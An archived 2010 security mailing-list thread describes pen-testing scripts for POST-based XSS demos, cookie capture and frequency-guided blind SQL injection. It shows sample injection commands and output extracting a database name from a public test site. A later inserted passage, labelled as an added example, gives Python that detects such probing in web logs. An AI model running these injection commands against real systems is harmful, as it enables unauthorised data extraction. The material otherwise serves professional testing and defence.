PaulDotCom mailing list archives
Re: Misc Web Pen testing scripts
From: Dimitrios Kapsalis <dimitrios () gmail com>
Date: Tue, 7 Sep 2010 10:35:23 -0500
Thanks for sharing!

On Tue, Sep 7, 2010 at 10:30 AM, Baggett, Mark <mark.baggett () morris com> wrote:

Not at all, but let me clean them up a bit first. I have a few small errors to fix, then I'll post them to the pdc blog.

-----Original Message-----
From: pauldotcom-bounces () mail pauldotcom com [mailto:pauldotcom-bounces () mail pauldotcom com] On Behalf Of Robin Wood
Sent: Sunday, September 05, 2010 11:49 AM
To: PaulDotCom Security Weekly Mailing List
Subject: Re: [Pauldotcom] Misc Web Pen testing scripts

Would you mind if I added these to the PenTester Scripting website http://www.pentesterscripting.com/ ?

Robin

On 3 September 2010 17:31, Baggett, Mark <mark.baggett () morris com> wrote:

I'm trying to learn python. Userpass.py was my first python script. (http://pauldotcom.com/2010/08/draft---creating-per-user-cust.html) Eventually, I am going to write something that doesn't completely suck. These scripts are still a work in progress. Send me comments and suggestions off list. I hope they are useful. If you find errors before I post these to the blog, I'd appreciate a heads up.

Thanks
Mark Baggett

1) get2post.py
Use to demonstrate POST-based XSS attacks to a customer. Put get2post on a single host, then you can create URLs with the POST values for the customer. Same functionality as http://www.whiteacid.org/misc/xss_post_forwarder.php but on your own server, so you are not disclosing a customer's XSS issues to a third party.

2) p0wnpr0xy.py
Grabs URLs & cookies as you browse and launches the tool of choice. Here is a demo video: http://www.vimeo.com/14667308

3) sqlinjector.py
This is a MySQL blind SQL injector that uses a much different SQL injection technique. Instead of repeatedly cutting the alphabet in half or brute forcing the letters, it uses a per-letter frequency table to predict the next letter. For example, if you have a Q there is a HIGH probability that the next letter is a U. The technique is discussed and outlined here: http://www.exploit-db.com/papers/13696/ 47 fewer guesses than bsqlbf.pl! 79 vs 126. I implemented this technique in python.

You give the script a vulnerable URL, and you put your SQL query in the URL with carets as markers at the point of injection. This syntax enables flexible URL endings.

mark.baggett$ python sqlinjector.py "http://testphp.vulnweb.com/listproducts.php?cat=1^database()^#"
a
ac
acu
acua
acuar
acuart
end of word found
Found target acuart in 79 guesses.
mtcexcp007:misc mark.baggett$
mark.baggett$ perl bsqlbf.pl -blind cat -sql "database()" -url http://testphp.vulnweb.com/listproducts.php?cat=1
// Blind SQL injection brute force.
// aramosf () 514 es / http://www.514.es
<truncated>
trying: acuart####
results: database() = acuart
total hits: 126

_______________________________________________
Pauldotcom mailing list
Pauldotcom () mail pauldotcom com
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com
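Whether a blind injector guesses by bisection or by a letter-frequency table, it still has to send dozens of requests against one parameter of one page (79 and 126 in the runs above), and that burst is what a defender can see in the web server log. The following is an added detection example, not code from the thread or from any of Mark's scripts; the log lines, client addresses and threshold are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed Apache-style access log lines (not taken from the original post): one
# client walking the "cat" parameter through successive guesses, plus normal traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [07/Sep/2010:10:30:01 -0500] "GET /listproducts.php?cat=1 HTTP/1.1" 200 5120
203.0.113.5 - - [07/Sep/2010:10:30:02 -0500] "GET /listproducts.php?cat=1%20AND%20substring(database(),1,1)='a' HTTP/1.1" 200 5120
203.0.113.5 - - [07/Sep/2010:10:30:02 -0500] "GET /listproducts.php?cat=1%20AND%20substring(database(),2,1)='c' HTTP/1.1" 200 5120
203.0.113.5 - - [07/Sep/2010:10:30:03 -0500] "GET /listproducts.php?cat=1%20AND%20substring(database(),3,1)='u' HTTP/1.1" 200 5120
203.0.113.5 - - [07/Sep/2010:10:30:03 -0500] "GET /listproducts.php?cat=1%20AND%20substring(database(),4,1)='a' HTTP/1.1" 200 5120
198.51.100.9 - - [07/Sep/2010:10:30:04 -0500] "GET /listproducts.php?cat=2 HTTP/1.1" 200 4980
"""

# Client address, request target and status from a combined/common log line.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')
# SQL-looking content inside a parameter value: function calls or boolean conditions.
SQL_TOKENS = re.compile(
    r"\b(?:select|union|substring|database|ascii|sleep|benchmark)\s*\(|\b(?:and|or)\b\s+\S+\s*=",
    re.I,
)

def suspicious_parameters(log_text, threshold=3):
    """Return {(client, path, param): distinct_probe_count} for every parameter that a
    single client hit with at least `threshold` distinct SQL-looking values. A real
    threshold would be tuned per site; 3 is chosen only to fit the constructed sample."""
    probes = defaultdict(set)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        client, target = m.group(1), m.group(2)
        parts = urlsplit(target)
        for name, values in parse_qs(parts.query, keep_blank_values=True).items():
            for value in values:
                if SQL_TOKENS.search(unquote(value)):
                    probes[(client, parts.path, name)].add(value)
    return {key: len(vals) for key, vals in probes.items() if len(vals) >= threshold}

if __name__ == "__main__":
    for (client, path, param), count in suspicious_parameters(SAMPLE_LOG).items():
        print(f"{client} sent {count} distinct SQL-looking values to {path}?{param}")
```

Counting distinct values rather than raw hits keeps a user reloading one odd-looking URL from tripping the rule, while a letter-by-letter extraction necessarily changes the value on every request.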
Current thread:
- Misc Web Pen testing scripts Baggett, Mark (Sep 03)
- Re: Misc Web Pen testing scripts Robin Wood (Sep 07)
- Re: Misc Web Pen testing scripts Baggett, Mark (Sep 07)
- Re: Misc Web Pen testing scripts Dimitrios Kapsalis (Sep 07)
- Re: Misc Web Pen testing scripts Baggett, Mark (Sep 07)
- Re: Misc Web Pen testing scripts Robin Wood (Sep 07)